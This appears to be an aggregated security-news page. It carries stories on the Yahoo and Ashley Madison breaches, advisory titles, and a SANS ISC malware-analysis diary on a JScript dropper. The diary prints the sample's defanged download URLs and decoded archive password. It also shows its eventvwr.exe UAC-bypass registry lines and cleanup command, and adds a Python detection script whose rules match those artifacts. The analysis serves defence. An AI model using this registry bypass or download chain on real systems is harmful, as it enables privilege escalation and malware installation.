(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Someone had faster access to over a billion Yahoo accounts' data. (credit: Scott Schiller)

On December 14, Yahoo announced that after an investigation into data provided by law enforcement officials in November, the company and outside forensics experts have determined that there was in fact a previously undetected breach of data from over 1 billion user accounts. The breach took place in August 2013, and is apparently distinct from the previous mega-breach revealed this fall—one Yahoo claims was conducted by a "state-sponsored actor".

The information accessed from potentially exposed accounts "may have included names, email addresses, telephone numbers, dates of birth, hashed passwords (using MD5) and, in some cases, encrypted or unencrypted security questions and answers," Yahoo's chief information security officer Bob Lord reported in the statement issued by the company. "The investigation indicates that the stolen information did not include passwords in clear text, payment card data, or bank account information. Payment card data and bank account information are not stored in the system the company believes was affected."

It's not clear whether the data provided by law enforcement to Yahoo is connected to samples offered on an underground site this past August, particularly since Yahoo still remains unsure of how the user data was spirited out of its systems in the first place. But the breach news doesn't end there.


 
Multiple IBM Products CVE-2016-8943 Cross Site Scripting Vulnerability
 
Multiple IBM Products CVE-2016-8941 Cross Site Request Forgery Vulnerability
 


Ashley Madison, the dating website for married people seeking extramarital affairs, will pay the Federal Trade Commission (FTC) $1.6 million for its failure to protect the account information of 36 million users, for failing to delete account information after regretful users paid a $19 fee, and for luring users with fake accounts of “female” users.

In a press conference call, FTC Chairwoman Edith Ramirez said the commission had secured a $17.5 million settlement, but the company will only pay $1.6 million of that amount due to inability to pay. Ashley Madison's operators are also required to implement a data security program that will be audited by a third party, according to the settlement.

The website was hacked in August 2015, and the hack resulted in the release of user names, first and last names, hacked passwords, partial credit card data, street names, phone numbers, records of transactions, and e-mail addresses. In the wake of the hack, it was discovered that many people who paid the company $20 for a “Full Delete” had been bilked—Ashley Madison parent company Avid Life Media, now Ruby Corporation, had left that data on its servers for up to 12 months after the request had been made.


 
Adobe Flash Player CVE-2016-7890 Unspecified Security Bypass Vulnerability
 
Adobe Flash Player APSB16-39 Multiple Unspecified Memory Corruption Vulnerabilities
 
Adobe Flash Player APSB16-39 Multiple Unspecified Remote Code Execution Vulnerabilities
 
Apple macOS/iOS/tvOS Multiple Security Vulnerabilities
 
Adobe Animate <= v15.2.1.95 Memory Corruption Vulnerability
 
SAP HANA Cockpit Information Disclosure Vulnerability
 
WebKit CVE-2016-7592 Denial of Service Vulnerability
 
Apple macOS APPLE-SA-2016-12-13-1 Multiple Security Vulnerabilities
 

(credit: Sean Rayford/Getty Images / Aurich)

“Through our e-mails and our social media accounts we get death threats all the time,” said Janisha Gabriel. “For anyone who’s involved in this type of work, you know that you take certain risks.”

These aren’t the words of a politician or a prison guard but of a Web designer. Gabriel owns Haki Creatives, a design firm that specializes in building websites for social activist groups like Black Lives Matter (BLM)—and for that work strangers want to kill her.

When these people aren’t hurling threats at the site’s designer, they’re hurling attacks at the BLM site itself—on 117 separate occasions in the past six months, to be precise. They’re renting servers and wielding botnets, putting attack calls out on social media, and trialling different attack methods to see what sticks. In fact, it’s not even clear whether ‘they’ are the people publicly claiming to perform the attacks.


 
Apple iOS/watchOS/macOS CVE-2016-7644 Remote Code Execution Vulnerability
 
SAP Mobile Defense & Security Remote Authorization Bypass Vulnerability
 
SAP HANA Cockpit Cross Site Scripting Vulnerability
 
SAP HANA Remote Authorization Bypass Vulnerability
 
SAP HANA XS Classic Information Disclosure Vulnerability
 
Cisco Email Security Appliance CVE-2016-6465 Remote Security Bypass Vulnerability
 
SAP Netweaver ABAP Remote Authorization Bypass Vulnerability
 
Visonic PowerLink2 Cross Site Scripting And Information Disclosure Vulnerabilities
 
Secunia Research: Microsoft Windows Type 1 Font Processing Vulnerability
 
Apache Struts CVE-2016-8738 Denial of Service Vulnerability
 
Multiple Delta Electronics Products Local Buffer Overflow and Arbitrary File Access Vulnerabilities
 
SAP Netweaver ABAP EA-DFPS Remote Authorization Bypass Vulnerability
 
Joomla! Core CVE-2016-9838 Remote Privilege Escalation Vulnerability
 
Mozilla Firefox MFSA2016-94 and MFSA2016-95 Multiple Security Vulnerabilities
 
CVE-2013-3143: MSIE 9 IEFRAME CMarkup::RemovePointerPos use-after-free
 
Mozilla Firefox MFSA2016-94 Multiple Security Vulnerabilities
 
Mozilla Firefox ESR CVE-2016-9905 Denial of Service Vulnerability
 

Yesterday, one of our readers sent us a malicious piece of JScript: doc2016044457899656.pdf.js.js. It's always interesting to have a look at samples coming from alternate sources because they may slightly differ from what we usually receive on a daily basis. Only yesterday, my spam trap collected 488 ransomware samples from different campaigns, all based on the same techniques.

The JScript code was, of course, obfuscated, but it remained easily readable by a human. Usually, there is no need to implement complex obfuscation to bypass AV detection: this sample had a score of 8/54 on VT. What was different? First of all, it just tries to download two files from a remote server:

  • hxxp://45.58.49.54/7za.exe
  • hxxp://45.58.49.54/process.zip

The bad guy was lazy (or smart?) and did not implement

The password of the downloaded archive is hardcoded as a hex-encoded string that the script decodes at runtime:

    var AACRSODLXACCGDOLOSOX = LXCTAOHOHSYOAASHNDCA("6D696E617331303030");

Decoding the hex string reveals the password:

    >>> "6D696E617331303030".decode("hex")
    'minas1000'

The destination path is generated via multiple variables and is finally set to C:\Users\[user]\AppData\Local\, [user] being the victim's account name. The downloaded 7za.exe[1] is then used to extract the archive with the decoded password:

    C:\Users\[user]\AppData\Local\7za.exe x C:\Users\[user]\AppData\Local\COCNOACTXATASGNOTOAS -pminas1000 -o C:\Users\[user]\AppData\Local\

Two new PE files are stored on the file system then executed:

  • processexplorerpe.exe (55c0548290a5dc43bc54a6a15ccd42fd) [2]
  • peprocesss.exe (6b96e8a9c13966086b1e2dd65ac84656) [3]

What makes this sample different? After the classic execution of the PE files, it tries to bypass the Windows UAC using a feature of eventvwr.exe. This system tool runs as a high-integrity process and consults the HKCU and HKCR registry hives to start mmc.exe, which finally opens eventvwr.msc. More information about this behaviour is available on the Microsoft website [4].

The trick is to create the registry entry that is checked by eventvwr.exe and to store the path of the malicious binary (variable ODASTATACOTSTAODHOOD) in its default value:

    var WshShell = WScript.CreateObject("WScript.Shell");
    WshShell.RegWrite("HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\\", ODASTATACOTSTAODHOOD, "REG_SZ");

Then the script builds the path to eventvwr.exe and launches it:

    var ZLGOZYLOLHONHTXTAOOR = environmentVars("WINDIR") + "\\SYSTEM32\\" + "eventvwr.exe";
    AAOGAODYSCSTSOAOLHAC = new ActiveXObject("Wscript.Shell");

Once done, the script removes the registry entry to clean up its traces:

    var wshShell = new ActiveXObject("WScript.Shell");
    wshShell.Run("REG DELETE HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /ve /f");

More information about this technique to bypass UAC is available on GitHub [5], with a PoC script in PowerShell.
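From the defender's side, the behaviour described above leaves two clear artifacts in endpoint telemetry: a value written under HKCU\Software\Classes\mscfile\shell\open\command, and eventvwr.exe spawning something other than mmc.exe. The script below is an added example written for this diary, not code from the sample, from the ISC or from the referenced PoC. It runs three checks over a handful of constructed, Sysmon-style registry (EventID 13) and process-creation (EventID 1) events; the host names, SIDs, user names and paths in the sample lines are made up. The registry path is matched by suffix because Sysmon records HKCU entries under HKU\<SID>; the third rule flags the standalone 7-Zip binary being run from AppData with a -p password switch, which is the dropper's extraction step.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

# Constructed, Sysmon-style events (EventID 13 = registry value set,
# EventID 1 = process creation), one key=value record per line.
# Hosts, SIDs, user names and paths are made up for this example.
SAMPLE_EVENTS = [
    "EventID=13 User=DESKTOP\\alice Image=C:\\Windows\\System32\\wscript.exe "
    "TargetObject=HKU\\S-1-5-21-111\\Software\\Classes\\mscfile\\shell\\open\\command\\(Default) "
    "Details=C:\\Users\\alice\\AppData\\Local\\peprocesss.exe",
    "EventID=1 User=DESKTOP\\alice ParentImage=C:\\Windows\\System32\\eventvwr.exe "
    "Image=C:\\Users\\alice\\AppData\\Local\\peprocesss.exe "
    "CommandLine=C:\\Users\\alice\\AppData\\Local\\peprocesss.exe",
    "EventID=1 User=DESKTOP\\bob ParentImage=C:\\Windows\\System32\\eventvwr.exe "
    "Image=C:\\Windows\\System32\\mmc.exe CommandLine=mmc.exe eventvwr.msc",
    "EventID=1 User=DESKTOP\\alice ParentImage=C:\\Windows\\System32\\wscript.exe "
    "Image=C:\\Users\\alice\\AppData\\Local\\7za.exe "
    "CommandLine=C:\\Users\\alice\\AppData\\Local\\7za.exe x "
    "C:\\Users\\alice\\AppData\\Local\\COCNOACTXATASGNOTOAS -pminas1000 "
    "-o C:\\Users\\alice\\AppData\\Local\\",
    "EventID=13 User=DESKTOP\\bob Image=C:\\Users\\bob\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe "
    "TargetObject=HKU\\S-1-5-21-222\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive "
    "Details=C:\\Users\\bob\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe",
]

# A value runs until the next " key=" token, so paths with spaces survive.
_FIELD_RE = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")


def parse_event(line: str) -> Dict[str, str]:
    """Parse one key=value record; values may contain spaces but not ' key='."""
    return dict(_FIELD_RE.findall(line))


@dataclass
class Finding:
    rule: str
    user: str
    detail: str


# The key abused by the sample, without its hive prefix: Sysmon logs HKCU
# writes under HKU\<SID>, so a suffix match covers both spellings.
MSCFILE_HANDLER = "\\software\\classes\\mscfile\\shell\\open\\command"


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def check_mscfile_handler(ev: Dict[str, str]) -> Optional[Finding]:
    """Rule 1: any value written under the mscfile open-command key."""
    if ev.get("EventID") != "13":
        return None
    target = ev.get("TargetObject", "")
    if MSCFILE_HANDLER in target.lower():
        return Finding("mscfile_handler_set", ev.get("User", ""),
                       f"{target} -> {ev.get('Details', '')}")
    return None


def check_eventvwr_child(ev: Dict[str, str]) -> Optional[Finding]:
    """Rule 2: eventvwr.exe legitimately starts only mmc.exe from the Windows directory."""
    if ev.get("EventID") != "1":
        return None
    parent = ev.get("ParentImage", "").lower()
    image = ev.get("Image", "").lower()
    if not parent.endswith("\\eventvwr.exe"):
        return None
    if _basename(image) == "mmc.exe" and image.startswith("c:\\windows\\"):
        return None
    return Finding("eventvwr_unexpected_child", ev.get("User", ""), ev.get("Image", ""))


def check_password_archive(ev: Dict[str, str]) -> Optional[Finding]:
    """Rule 3: standalone 7-Zip run from a user profile with a -p password switch."""
    if ev.get("EventID") != "1":
        return None
    image = ev.get("Image", "").lower()
    cmd = ev.get("CommandLine", "")
    if (_basename(image) in ("7za.exe", "7z.exe")
            and "\\appdata\\" in image
            and re.search(r"(^|\s)-p\S", cmd)):
        return Finding("seven_zip_password_extract", ev.get("User", ""), cmd)
    return None


RULES: List[Callable[[Dict[str, str]], Optional[Finding]]] = [
    check_mscfile_handler, check_eventvwr_child, check_password_archive]


def scan(lines: List[str]) -> List[Finding]:
    """Apply every rule to every event and collect the hits in input order."""
    findings: List[Finding] = []
    for line in lines:
        ev = parse_event(line)
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.user}: {f.detail}")
```

On the constructed input, the first, second and fourth lines fire one rule each, while bob's legitimate mmc.exe launch and his OneDrive Run key are left alone. Note that the sample deletes the key right after use, so the rule 1 write event, not the key's presence on disk, is what you should be alerting on.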

If you receive interesting samples, feel free to share them! We always need fresh meat!

[1] http://www.7-zip.org/download.html
[2] https://www.virustotal.com/en/file/305fe0e8e8753dd2bf79fd349760b5c83d75097becc98a541b489bd5456b7b5e/analysis/
[3] https://www.virustotal.com/en/file/7b1f0831ea6943fb1f2a2714f71b16c890baf15c985833e0a590fe6545c7e16f/analysis/
[4] https://msdn.microsoft.com/en-us/library/bb742441.aspx
[5] https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key


 
SIMATIC S7-300 and S7-400 CPUs Denial of Service and Information Disclosure Vulnerabilities
 
MSIE 9 MSHTML CMarkup::ReloadInCompatView use-after-free
 
[slackware-security] mozilla-firefox (SSA:2016-348-01)
 
APPLE-SA-2016-12-13-8 Transporter 1.9.2
 
APPLE-SA-2016-12-13-7 Additional information for APPLE-SA-2016-12-12-2 watchOS 3.1.1
 